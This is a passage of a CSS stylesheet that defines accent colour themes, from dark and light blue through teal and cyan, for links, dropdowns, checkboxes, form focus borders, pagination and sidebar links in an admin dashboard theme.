.accent-dark [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-dark [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-dark [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-dark [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-lightblue .btn-link,
.accent-lightblue a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #3c8dbc;
}
.accent-lightblue .btn-link:hover,
.accent-lightblue a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #296282;
}
.accent-lightblue .dropdown-item:active, .accent-lightblue .dropdown-item.active {
background: #3c8dbc;
color: #ffffff;
}
.accent-lightblue .custom-control-input:checked ~ .custom-control-label::before {
background: #3c8dbc;
border-color: #23536f;
}
.accent-lightblue .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-lightblue .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-lightblue .custom-select:focus,
.accent-lightblue .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-lightblue .custom-file-input:focus ~ .custom-file-label {
border-color: #99c5de;
}
.accent-lightblue .page-item.active .page-link {
background-color: #3c8dbc;
border-color: #3c8dbc;
}
.accent-lightblue .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-lightblue [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-lightblue [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-lightblue [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-lightblue [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-navy .btn-link,
.accent-navy a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #001f3f;
}
.accent-navy .btn-link:hover,
.accent-navy a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: black;
}
.accent-navy .dropdown-item:active, .accent-navy .dropdown-item.active {
background: #001f3f;
color: #ffffff;
}
.accent-navy .custom-control-input:checked ~ .custom-control-label::before {
background: #001f3f;
border-color: black;
}
.accent-navy .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-navy .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-navy .custom-select:focus,
.accent-navy .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-navy .custom-file-input:focus ~ .custom-file-label {
border-color: #005ebf;
}
.accent-navy .page-item.active .page-link {
background-color: #001f3f;
border-color: #001f3f;
}
.accent-navy .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-navy [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-navy [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-navy [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-navy [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-olive .btn-link,
.accent-olive a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #3d9970;
}
.accent-olive .btn-link:hover,
.accent-olive a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #276248;
}
.accent-olive .dropdown-item:active, .accent-olive .dropdown-item.active {
background: #3d9970;
color: #ffffff;
}
.accent-olive .custom-control-input:checked ~ .custom-control-label::before {
background: #3d9970;
border-color: #20503b;
}
.accent-olive .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-olive .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-olive .custom-select:focus,
.accent-olive .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-olive .custom-file-input:focus ~ .custom-file-label {
border-color: #87cfaf;
}
.accent-olive .page-item.active .page-link {
background-color: #3d9970;
border-color: #3d9970;
}
.accent-olive .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-olive [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-olive [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-olive [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-olive [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-lime .btn-link,
.accent-lime a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #01ff70;
}
.accent-lime .btn-link:hover,
.accent-lime a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #00b44e;
}
.accent-lime .dropdown-item:active, .accent-lime .dropdown-item.active {
background: #01ff70;
color: #1F2D3D;
}
.accent-lime .custom-control-input:checked ~ .custom-control-label::before {
background: #01ff70;
border-color: #009a43;
}
.accent-lime .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%231F2D3D' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-lime .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-lime .custom-select:focus,
.accent-lime .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-lime .custom-file-input:focus ~ .custom-file-label {
border-color: #81ffb8;
}
.accent-lime .page-item.active .page-link {
background-color: #01ff70;
border-color: #01ff70;
}
.accent-lime .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-lime [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-lime [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-lime [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-lime [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-fuchsia .btn-link,
.accent-fuchsia a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #f012be;
}
.accent-fuchsia .btn-link:hover,
.accent-fuchsia a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ab0b87;
}
.accent-fuchsia .dropdown-item:active, .accent-fuchsia .dropdown-item.active {
background: #f012be;
color: #ffffff;
}
.accent-fuchsia .custom-control-input:checked ~ .custom-control-label::before {
background: #f012be;
border-color: #930974;
}
.accent-fuchsia .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-fuchsia .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-fuchsia .custom-select:focus,
.accent-fuchsia .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-fuchsia .custom-file-input:focus ~ .custom-file-label {
border-color: #f88adf;
}
.accent-fuchsia .page-item.active .page-link {
background-color: #f012be;
border-color: #f012be;
}
.accent-fuchsia .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-fuchsia [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-fuchsia [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-fuchsia [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-fuchsia [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-maroon .btn-link,
.accent-maroon a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #d81b60;
}
.accent-maroon .btn-link:hover,
.accent-maroon a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #941342;
}
.accent-maroon .dropdown-item:active, .accent-maroon .dropdown-item.active {
background: #d81b60;
color: #ffffff;
}
.accent-maroon .custom-control-input:checked ~ .custom-control-label::before {
background: #d81b60;
border-color: #7d1038;
}
.accent-maroon .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-maroon .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-maroon .custom-select:focus,
.accent-maroon .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-maroon .custom-file-input:focus ~ .custom-file-label {
border-color: #f083ab;
}
.accent-maroon .page-item.active .page-link {
background-color: #d81b60;
border-color: #d81b60;
}
.accent-maroon .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-maroon [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-maroon [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-maroon [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-maroon [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-blue .btn-link,
.accent-blue a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #007bff;
}
.accent-blue .btn-link:hover,
.accent-blue a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #0056b3;
}
.accent-blue .dropdown-item:active, .accent-blue .dropdown-item.active {
background: #007bff;
color: #ffffff;
}
.accent-blue .custom-control-input:checked ~ .custom-control-label::before {
background: #007bff;
border-color: #004a99;
}
.accent-blue .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-blue .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-blue .custom-select:focus,
.accent-blue .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-blue .custom-file-input:focus ~ .custom-file-label {
border-color: #80bdff;
}
.accent-blue .page-item.active .page-link {
background-color: #007bff;
border-color: #007bff;
}
.accent-blue .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-blue [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-blue [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-blue [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-blue [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-indigo .btn-link,
.accent-indigo a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #6610f2;
}
.accent-indigo .btn-link:hover,
.accent-indigo a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #4709ac;
}
.accent-indigo .dropdown-item:active, .accent-indigo .dropdown-item.active {
background: #6610f2;
color: #ffffff;
}
.accent-indigo .custom-control-input:checked ~ .custom-control-label::before {
background: #6610f2;
border-color: #3d0894;
}
.accent-indigo .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-indigo .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-indigo .custom-select:focus,
.accent-indigo .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-indigo .custom-file-input:focus ~ .custom-file-label {
border-color: #b389f9;
}
.accent-indigo .page-item.active .page-link {
background-color: #6610f2;
border-color: #6610f2;
}
.accent-indigo .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-indigo [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-indigo [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-indigo [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-indigo [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-purple .btn-link,
.accent-purple a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #6f42c1;
}
.accent-purple .btn-link:hover,
.accent-purple a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #4e2d89;
}
.accent-purple .dropdown-item:active, .accent-purple .dropdown-item.active {
background: #6f42c1;
color: #ffffff;
}
.accent-purple .custom-control-input:checked ~ .custom-control-label::before {
background: #6f42c1;
border-color: #432776;
}
.accent-purple .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-purple .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-purple .custom-select:focus,
.accent-purple .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-purple .custom-file-input:focus ~ .custom-file-label {
border-color: #b8a2e0;
}
.accent-purple .page-item.active .page-link {
background-color: #6f42c1;
border-color: #6f42c1;
}
.accent-purple .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-purple [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-purple [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-purple [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-purple [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-pink .btn-link,
.accent-pink a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #e83e8c;
}
.accent-pink .btn-link:hover,
.accent-pink a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #c21766;
}
.accent-pink .dropdown-item:active, .accent-pink .dropdown-item.active {
background: #e83e8c;
color: #ffffff;
}
.accent-pink .custom-control-input:checked ~ .custom-control-label::before {
background: #e83e8c;
border-color: #ac145a;
}
.accent-pink .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-pink .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-pink .custom-select:focus,
.accent-pink .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-pink .custom-file-input:focus ~ .custom-file-label {
border-color: #f6b0d0;
}
.accent-pink .page-item.active .page-link {
background-color: #e83e8c;
border-color: #e83e8c;
}
.accent-pink .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-pink [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-pink [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-pink [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-pink [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-red .btn-link,
.accent-red a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #dc3545;
}
.accent-red .btn-link:hover,
.accent-red a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #a71d2a;
}
.accent-red .dropdown-item:active, .accent-red .dropdown-item.active {
background: #dc3545;
color: #ffffff;
}
.accent-red .custom-control-input:checked ~ .custom-control-label::before {
background: #dc3545;
border-color: #921925;
}
.accent-red .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-red .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-red .custom-select:focus,
.accent-red .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-red .custom-file-input:focus ~ .custom-file-label {
border-color: #efa2a9;
}
.accent-red .page-item.active .page-link {
background-color: #dc3545;
border-color: #dc3545;
}
.accent-red .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-red [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-red [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-red [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-red [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-orange .btn-link,
.accent-orange a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #fd7e14;
}
.accent-orange .btn-link:hover,
.accent-orange a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #c35a02;
}
.accent-orange .dropdown-item:active, .accent-orange .dropdown-item.active {
background: #fd7e14;
color: #1F2D3D;
}
.accent-orange .custom-control-input:checked ~ .custom-control-label::before {
background: #fd7e14;
border-color: #aa4e01;
}
.accent-orange .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%231F2D3D' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-orange .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-orange .custom-select:focus,
.accent-orange .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-orange .custom-file-input:focus ~ .custom-file-label {
border-color: #fec392;
}
.accent-orange .page-item.active .page-link {
background-color: #fd7e14;
border-color: #fd7e14;
}
.accent-orange .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-orange [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-orange [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-orange [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-orange [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-yellow .btn-link,
.accent-yellow a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #ffc107;
}
.accent-yellow .btn-link:hover,
.accent-yellow a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ba8b00;
}
.accent-yellow .dropdown-item:active, .accent-yellow .dropdown-item.active {
background: #ffc107;
color: #1F2D3D;
}
.accent-yellow .custom-control-input:checked ~ .custom-control-label::before {
background: #ffc107;
border-color: #a07800;
}
.accent-yellow .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%231F2D3D' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-yellow .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-yellow .custom-select:focus,
.accent-yellow .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-yellow .custom-file-input:focus ~ .custom-file-label {
border-color: #ffe187;
}
.accent-yellow .page-item.active .page-link {
background-color: #ffc107;
border-color: #ffc107;
}
.accent-yellow .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-yellow [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-yellow [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-yellow [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-yellow [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-green .btn-link,
.accent-green a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #28a745;
}
.accent-green .btn-link:hover,
.accent-green a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #19692c;
}
.accent-green .dropdown-item:active, .accent-green .dropdown-item.active {
background: #28a745;
color: #ffffff;
}
.accent-green .custom-control-input:checked ~ .custom-control-label::before {
background: #28a745;
border-color: #145523;
}
.accent-green .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-green .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-green .custom-select:focus,
.accent-green .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-green .custom-file-input:focus ~ .custom-file-label {
border-color: #71dd8a;
}
.accent-green .page-item.active .page-link {
background-color: #28a745;
border-color: #28a745;
}
.accent-green .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-green [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-green [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-green [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-green [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-teal .btn-link,
.accent-teal a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #20c997;
}
.accent-teal .btn-link:hover,
.accent-teal a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #158765;
}
.accent-teal .dropdown-item:active, .accent-teal .dropdown-item.active {
background: #20c997;
color: #ffffff;
}
.accent-teal .custom-control-input:checked ~ .custom-control-label::before {
background: #20c997;
border-color: #127155;
}
.accent-teal .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-teal .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-teal .custom-select:focus,
.accent-teal .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-teal .custom-file-input:focus ~ .custom-file-label {
border-color: #7eeaca;
}
.accent-teal .page-item.active .page-link {
background-color: #20c997;
border-color: #20c997;
}
.accent-teal .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-teal [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-teal [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-teal [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-teal [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-cyan .btn-link,
.accent-cyan a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #17a2b8;
}
.accent-cyan .btn-link:hover,
.accent-cyan a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #0f6674;
}
.accent-cyan .dropdown-item:active, .accent-cyan .dropdown-item.active {
background: #17a2b8;
color: #ffffff;
}
.accent-cyan .custom-control-input:checked ~ .custom-control-label::before {
background: #17a2b8;
border-color: #0c525d;
}
.accent-cyan .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-cyan .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-cyan .custom-select:focus,
